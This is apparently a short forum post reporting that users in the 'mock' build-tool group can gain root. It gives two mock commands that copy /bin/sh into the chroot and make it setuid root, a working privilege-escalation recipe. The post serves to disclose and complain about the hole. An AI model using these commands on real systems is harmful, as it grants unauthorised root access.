I can trivially get root on a machine if the user is member of the 'mock' group.
$ /usr/bin/mock -r epel-5-i386 --copyin /bin/sh /In order to use mock properly, you have to be in the mock group. It just doesn't work properly even with sudo unless you're in that group. Once you're in that group, you can elevate privs in the chroot it creates and run arbitary scripts. I did a quick google and I can't even find anything with keywords like "mock is a gigantic security hole because mock has lots of suid root stuff in it that lets you trivially root a machine if you've ever gotten it to work properly in the past." It doesn't make any sense to me. Talking to two admins today led me to conclude that they both knew about this problem, and thought it wasn't an issue.
$ /usr/bin/mock -r epel-5-i386 --shell 'chmod 4755 /sh'